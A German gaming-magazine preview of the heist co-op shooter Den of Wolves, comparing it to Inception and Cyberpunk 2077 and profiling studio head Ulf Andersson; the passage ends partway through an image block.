<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583259","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Ein spielbares Inception in Cyberpunk 2077, in dem wir Mr. Bowman glauben lassen, er w\u00fcrde gerade uns foltern; unsere Gedanken durchsuchen. Dabei kontrollieren wir ihn\u2026","alt":"Ein spielbares Inception in Cyberpunk 2077, in dem wir Mr. Bowman glauben lassen, er w\u00fcrde gerade uns foltern; unsere Gedanken durchsuchen. Dabei kontrollieren wir ihn\u2026"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Ein spielbares Inception in Cyberpunk 2077, in dem wir Mr. Bowman glauben lassen, er würde gerade uns foltern; unsere Gedanken durchsuchen. Dabei kontrollieren wir ihn…" class="wp-image-2583259" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?resize=300%2C153&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?resize=768%2C392&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?resize=1200%2C612&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?resize=1536%2C784&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_02.jpeg?resize=2048%2C1045&amp;quality=50&amp;strip=all 2048w" width="1200" height="612" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Ein spielbares Inception in Cyberpunk 2077, in dem wir Mr. Bowman glauben lassen, er würde gerade uns foltern; unsere Gedanken durchsuchen. Dabei kontrollieren wir ihn…" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Ein spielbares Inception, in dem wir Mr. Bowman glauben lassen, er würde gerade uns foltern; unsere Gedanken durchsuchen. Dabei kontrollieren wir ihn…</p></figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Wir sind nicht Opfer, sondern Jäger, der sein Opfer glauben lässt, es sei in Kontrolle. Mind-Games auf dem höchsten Level.</p>



<p>Wir sind Leonardo DiCaprio in einem spielbaren <em>Inception</em>, in dem wir einen ähnlich brillanten Heist durchführen wie dessen Crew rund um Tom Hardy, Joseph Gordon-Levitt und Elliot Page in Christopher Nolans bestem Film geschafft hat, Multi-Milliardär-Mogul Saito zu überlisten.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Den of Wolves spielt in einer völlig abgedrehten KI-Welt, in der Software längst nicht mehr ausreicht, um Daten zu schützen. KI und Quantencomputer knacken jeden Code. Stattdessen benutzt man menschliche Gehirne zum Dekodieren. </p>



<p>Es gibt eine regelrechte Wall Street für Gehirn-Power. Eine kranke Welt, die ursprünglich einfach einmal nur <em>Payday 5</em> in der Zukunft sein sollte. Aus der aber so viel mehr entstanden ist. Eine Art <em>Cyberpunk 2077</em> meets <em>Ghost in the Shell,</em> mit 400 Konzernen, die alle eigene Hauptquartiere haben, Führungsetagen, CEOs.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583260","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Den of Wolves k\u00f6nnte der Cyberpunk-2077-Multiplayer werden, von der wir schon so lange tr\u00e4umen. Es dreht sich alles um diese Heists mit Hightech-Ger\u00e4t, wie dieser Drohne, die den Tresor knackt \u2013 wir m\u00fcssen nur die Position halten.","alt":"Den of Wolves k\u00f6nnte der Cyberpunk-2077-Multiplayer werden, von der wir schon so lange tr\u00e4umen. Es dreht sich alles um diese Heists mit Hightech-Ger\u00e4t, wie dieser Drohne, die den Tresor knackt \u2013 wir m\u00fcssen nur die Position halten."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Den of Wolves könnte der Cyberpunk-2077-Multiplayer werden, von der wir schon so lange träumen. Es dreht sich alles um diese Heists mit Hightech-Gerät, wie dieser Drohne, die den Tresor knackt – wir müssen nur die Position halten." class="wp-image-2583260" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_03.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Den of Wolves könnte der Cyberpunk-2077-Multiplayer werden, von der wir schon so lange träumen. Es dreht sich alles um diese Heists mit Hightech-Gerät, wie dieser Drohne, die den Tresor knackt – wir müssen nur die Position halten." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Den of Wolves könnte der Cyberpunk-2077-Multiplayer werden, von der wir schon so lange träumen. Es dreht sich alles um diese Heists mit Hightech-Gerät, wie dieser Drohne, die den Tresor knackt – wir müssen nur die Position halten.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Eine Konzern-Welt, für die das Studio 10 Chambers eigene Produktreihen und Marketingkampagnen entwickelt hat – die nicht nur Platzhalter sind, sondern Story-Treiber – wie in Cyberpunk.</p>



<p>Die Konzerne bekriegen sich gegenseitig, mit perfiden Mitteln. Wir dringn etwa in die Gedankenwelt eines Vorstandsmitglieds ein, kopieren sein Gehirn und schicken dann einen Klon zum Meeting, der Wirtschaftsinformationen ausspioniert.</p>



<p>Als würde jemand Elon Musks Gehirn hacken und wüsste schon vorher, was der nächste Tesla kann. Es ist das spielbare <em>Inception</em>, wovon Gaming-Fan Christopher Nolan vielleicht sogar schon mal geträumt hat.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>„Ein Heist muss nicht in der Realität stattfinden. Nicht nur in physischen Gebäuden. Nicht zwingend der Limitation von realer Zeit unterworfen sein“</p>
<cite>Ulf Andersson, Creative Director &amp; CEO 10 Chambers</cite></blockquote>



<h2 class="wp-block-heading toc">Koop-Gameplay meets Inception &amp; Cyberpunk 2077</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583261","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Ulf Andersson ist der K\u00f6nig von Payday und Den of Wolves sollte urspr\u00fcnglich einfach nur Payday 5 in der Zukunft werden. Aber es wurde sooo viel mehr daraus \u2026","alt":"Ulf Andersson ist der K\u00f6nig von Payday und Den of Wolves sollte urspr\u00fcnglich einfach nur Payday 5 in der Zukunft werden. Aber es wurde sooo viel mehr daraus \u2026"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Ulf Andersson ist der König von Payday und Den of Wolves sollte ursprünglich einfach nur Payday 5 in der Zukunft werden. Aber es wurde sooo viel mehr daraus …" class="wp-image-2583261" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?resize=300%2C163&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?resize=768%2C417&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?resize=1200%2C652&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?resize=1536%2C834&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_04.jpeg?resize=2048%2C1112&amp;quality=50&amp;strip=all 2048w" width="1200" height="652" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Ulf Andersson ist der König von Payday und Den of Wolves sollte ursprünglich einfach nur Payday 5 in der Zukunft werden. Aber es wurde sooo viel mehr daraus …" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Ulf Andersson ist der König von Payday und Den of Wolves sollte ursprünglich einfach nur Payday 5 in der Zukunft werden. Aber es wurde sooo viel mehr daraus …</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p><em>Inception </em>ist so brillant, weil es sich real anfühlt – es zeigt das reale Paris, welches sich beliebig formen lässt. Dies geschieht durch die Gedanken seiner Protagonisten. Es hat Schusssequenzen mit Railguns im James-Bond-Style, weil der Traumwelten-Designer sich diese wünscht, gegen eine Armee in den Bergen.</p>



<p>Aber es hat auch so viele Mindfuck-Momente, in denen wir uns fragen: Ist das jetzt real? Oder nur in ihren Gedanken passiert? Und wo ist eigentlich die Grenze zwischen Gedanken-Palästen und der Realität?</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p><em>Den of Wolves</em> ist schon auch wie <em>Payday</em>: ein Koop-Shooter, bei dem jeder seine Rolle spielt. Aber es ist viel größer, viel wuchtiger inszeniert. Mit dem hämmernden Elektro-Sound und wie sich diese Neon-Welten anfühlen, das wirkt fast ein bisschen wie das Multiplayer-Cyberpunk unserer Träume.</p>



<p><a href="https://www.amazon.de/Deep-Silver-PAYDAY-Day-PlayStation/dp/B0C7QJYH63/" target="_blank" rel="noreferrer noopener">PAYDAY 3 Day One Edition bei Amazon</a></p>



<p>Es gab lange Zeit Gerüchte, CD Projekt RED wollte eine Art <em>GTA Online</em> für Night City entwerfen. Wo wir dann nicht nur Villen infiltrieren, ihre Sicherheitssysteme lahmlegen und dann einen Krater in der Landschaft hinterlassen. Sondern dort ganz mondän im Pool unserer eigenen Villa chillen. Und vielleicht sogar Konzerne lenken? Die Möglichkeiten sind endlos …</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583263","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Vieles befindet sich noch in der Konzeptphase oder ist geheim. Aber gerade dieses Sprengen von \u201ekreativen Eing\u00e4ngen\u201c im Bad-Company-Style stellen wir uns enorm spannend vor.","alt":"Vieles befindet sich noch in der Konzeptphase oder ist geheim. Aber gerade dieses Sprengen von \u201ekreativen Eing\u00e4ngen\u201c im Bad-Company-Style stellen wir uns enorm spannend vor."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Vieles befindet sich noch in der Konzeptphase oder ist geheim. Aber gerade dieses Sprengen von „kreativen Eingängen“ im Bad-Company-Style stellen wir uns enorm spannend vor." class="wp-image-2583263" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_05.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Vieles befindet sich noch in der Konzeptphase oder ist geheim. Aber gerade dieses Sprengen von „kreativen Eingängen“ im Bad-Company-Style stellen wir uns enorm spannend vor." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Vieles befindet sich noch in der Konzeptphase oder ist geheim. Aber gerade dieses Sprengen von „kreativen Eingängen“ im Bad-Company-Style stellen wir uns enorm spannend vor.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Man kann sich das alles gut vorstellen, denn Creative Director und 10 Chambers CEO Ulf Andersson hat seine Liebe für Hollywood auf ganz kleinem Level in <em>Payday </em>abgeliefert: Die cineastische Mission, in der wir mit dem Seilzug über Wolkenkratzer fliegen, ist eine Verbeugung vor The Dark Knight.</p>



<p>Vielleicht sollte das Team mal bei Christopher Nolan anklopfen, der hätte sicherlich Lust auf ein <em>Inception</em>-Game. Andersson ist einer dieser Power-Creatives unserer Branche, der schon immer dabei war.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583264","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Die Masken sind inspiriert von der Anfangsszene aus The Dark Knight, werden aber auch als Gameplay-Element genutzt \u2013 um Dialog zu kommunizieren; Gesundheitsdaten etc.","alt":"Die Masken sind inspiriert von der Anfangsszene aus The Dark Knight, werden aber auch als Gameplay-Element genutzt \u2013 um Dialog zu kommunizieren; Gesundheitsdaten etc."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Die Masken sind inspiriert von der Anfangsszene aus The Dark Knight, werden aber auch als Gameplay-Element genutzt – um Dialog zu kommunizieren; Gesundheitsdaten etc." class="wp-image-2583264" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?resize=300%2C154&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?resize=768%2C395&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?resize=1200%2C618&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?resize=1536%2C791&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_06.jpeg?resize=2048%2C1054&amp;quality=50&amp;strip=all 2048w" width="1200" height="618" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Die Masken sind inspiriert von der Anfangsszene aus The Dark Knight, werden aber auch als Gameplay-Element genutzt – um Dialog zu kommunizieren; Gesundheitsdaten etc." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Die Masken sind inspiriert von der Anfangsszene aus The Dark Knight, werden aber auch als Gameplay-Element genutzt – um Dialog zu kommunizieren; Gesundheitsdaten etc.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Ulf Andersson hat klein angefangen mit <em>Delta-Force</em>-Mods und hat dann an <em>Fortress </em>gearbeitet – einem leider gecancelten Spin-Off zu <em>Final Fantasy</em>, das sich wie <em>Dark Souls </em>spielen und<em> Final Fantasy</em> in nordischen Landen anfühlen sollte.</p>



<p><a href="https://www.amazon.de/Final-Fantasy-XVI-PlayStation-5/dp/B0BPML6RZ8/" target="_blank" rel="noreferrer noopener">Final Fantasy XVI bei Amazon</a></p>



<p>Seine Liebe für Teamplay führte dann zu <em>Payday </em>– einem der größten Koop-Hits unserer Zeit. Er brauchte danach eine Pause, traf auf einer Geburtstagsparty seinen späteren Co-Founder und jetzt Chefautor und Komponisten Svante Vinternatt, hatte wieder Lust, Energie und eine Idee – eine Art <em>Payday </em>mit Delta-Force-Schwierigkeitsgrad in unheimlichen Bergwerken.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583265","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Dieser Shot hat genau diese Horror-Sci-Fi-DNA, die GTFO so stark gemacht haben. Eine Welt, die uns hasst. Nur hier sind es eher Hightech-Special-Forces und Security-Roboter, die unsere Gegner stellen.","alt":"Dieser Shot hat genau diese Horror-Sci-Fi-DNA, die GTFO so stark gemacht haben. Eine Welt, die uns hasst. Nur hier sind es eher Hightech-Special-Forces und Security-Roboter, die unsere Gegner stellen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Dieser Shot hat genau diese Horror-Sci-Fi-DNA, die GTFO so stark gemacht haben. Eine Welt, die uns hasst. Nur hier sind es eher Hightech-Special-Forces und Security-Roboter, die unsere Gegner stellen." class="wp-image-2583265" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_07.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Dieser Shot hat genau diese Horror-Sci-Fi-DNA, die GTFO so stark gemacht haben. Eine Welt, die uns hasst. Nur hier sind es eher Hightech-Special-Forces und Security-Roboter, die unsere Gegner stellen." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Dieser Shot hat genau diese Horror-Sci-Fi-DNA, die GTFO so stark gemacht haben. Eine Welt, die uns hasst. Nur hier sind es eher Hightech-Special-Forces und Security-Roboter, die unsere Gegner stellen.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Und so entstand <a href="https://store.steampowered.com/agecheck/app/493520/" target="_blank" rel="noreferrer noopener">GTFO</a>. Ein Spiel, welches sehr viel <em>Payday</em>-DNA hat. Man muss sich aufeinander verlassen. Jeder hat seine Rolle. Nur, wenn jeder diese zur Perfektion ausführt, überlebt das Team.</p>



<p><strong>Es ist ein Shooter für alle, die planen wollen.</strong> Die Strategien austüfteln und bereit sind, Taktiken zu erproben und die kein Problem damit haben, ein Level zigmal zu spielen, weil es ums Meistern geht. Es geht um dieses <em>Elden-Ring</em>-Gefühl, das Unmögliche möglich gemacht zu haben.</p>



<p>Das ist diese Koop-DNA, bei der das Planen und Taktieren genauso wichtig ist wie das präzise Schießen mit dem Sturmgewehr. Das zieht sich auch durch <em>Den of Wolves</em> und seine Welt Midway City.</p>



<h2 class="wp-block-heading toc">Midway City: Die Gier und Technologie einer düsteren Zukunft</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583266","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Synethra \u2013 Kazuko \u2013 Vtashi: Den of Wolves d\u00fcrfte ein Heist-Koop-Shooter werden in einer Welt, die 10 Chambers auf einem \u00e4hnlich hohen Detail- und Storytelling-Level wie die Konzerne in Cyberpunk 2077 inszeniert.","alt":"Synethra \u2013 Kazuko \u2013 Vtashi: Den of Wolves d\u00fcrfte ein Heist-Koop-Shooter werden in einer Welt, die 10 Chambers auf einem \u00e4hnlich hohen Detail- und Storytelling-Level wie die Konzerne in Cyberpunk 2077 inszeniert."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Synethra – Kazuko – Vtashi: Den of Wolves dürfte ein Heist-Koop-Shooter werden in einer Welt, die 10 Chambers auf einem ähnlich hohen Detail- und Storytelling-Level wie die Konzerne in Cyberpunk 2077 inszeniert." class="wp-image-2583266" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, 